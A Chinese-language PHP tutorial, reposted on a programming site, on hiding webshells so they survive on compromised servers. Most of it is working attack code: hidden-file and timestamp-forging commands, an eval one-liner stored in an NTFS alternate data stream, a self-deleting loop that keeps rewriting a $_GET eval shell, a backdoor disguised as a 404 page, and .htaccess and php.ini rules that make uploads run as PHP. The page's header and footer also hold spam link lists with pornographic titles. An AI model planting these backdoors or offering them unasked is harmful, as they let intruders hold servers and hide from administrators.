一区二区三区在线-一区二区三区亚洲视频-一区二区三区亚洲-一区二区三区午夜-一区二区三区四区在线视频-一区二区三区四区在线免费观看

服務器之家:專注于服務器技術及軟件下載分享
分類導航

PHP教程|ASP.NET教程|Java教程|ASP教程|編程技術|正則表達式|C/C++|IOS|C#|Swift|Android|VB|R語言|JavaScript|易語言|vb.net|

服務器之家 - 編程語言 - PHP教程 - PHP后門隱藏的一些技巧總結

PHP后門隱藏的一些技巧總結

2021-10-28 15:11Bypass PHP教程

這篇文章主要介紹了關于PHP后門隱藏的一些技巧,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

前言

如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時間屬性,隱藏文件內容等。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

?
1
attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創建的文件,那么,除了創建一個迷惑性的文件名,還需要修改文件的修改日期。

?
1
2
3
4
5
6
//修改時間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問時間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創建時間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

?
1
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創建和修改時間

?
1
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內容

在服務器上echo一個數據流文件進去,比如index.php是網頁正常文件,我們可以這樣子搞:

?
1
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規的文件管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。

利用include函數,將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

?
1
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死馬

不死馬會刪除自身,以進程的形式循環創建隱蔽的后門。

?
1
2
3
4
5
6
7
8
9
10
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //刪除自身
while(1)
{
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //創建shell.php,這里最好用免殺的一句話
 sleep(10); //間隔時間
}
?>

處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發送特定參數的字符串過去時,即可觸發后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

?
1
2
3
4
5
6
7
8
9
10
11
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件構成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

?
1
AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規則,把文件名包含1的解析成php,上傳1.txt即可解析。

?
1
2
3
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file = "c:\tmp.txt"

需重啟服務生效,訪問任意一個php文件即可獲取webshell。

總結

到此這篇關于PHP后門隱藏的一些技巧的文章就介紹到這了,更多相關PHP后門隱藏技巧內容請搜索服務器之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持服務器之家!

原文鏈接:https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448906266&idx=1&sn=f9bf831185248cb9d6297b91cfa73ea8

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 日本四虎影视 | 日本黄色录像视频 | 亚洲 日本 天堂 国产 在线 | 99久久www免费 | 日韩欧美a | 久久免费看少妇高潮A片2012 | 好大用力深一点视频 | 欧美精品色精品一区二区三区 | 久久精品国产色蜜蜜麻豆国语版 | 男女姓交大视频免费观看 | 暖暖影院日本版 | 久久青草免费91线频观看站街 | 美妇在男人胯下哀求 | 国产精品久久久免费视频 | 亚洲国产日韩成人综合天堂 | 好女孩韩剧免费观看 | 日本老头4569gay | a级毛片毛片免费观看永久 a级黄色片免费 | 国产二区三区 | 精品国产91高清在线观看 | 99精品久久精品一区二区 | 吃瓜视频在线观看 | 国产午夜精品一区二区 | 日本免费一区二区三区四区五六区 | 秋霞啪啪网 | 天天操天天爽天天射 | 波多野结衣52部合集在线观看 | 精品国产一区二区 | 操极品女神 | 亚洲成色爱我久久 | 性色生活片在线观看 | 欧美男女爱爱视频 | 成人在线小视频 | 34g污奶跳舞| 国产午夜不卡 | 国产欧美精品专区一区二区 | 亚洲第一网色综合久久 | 亚洲一区二区三区不卡在线播放 | 亚洲欧美日韩国产一区图片 | 国人精品视频在线观看 | 美女视频久久 |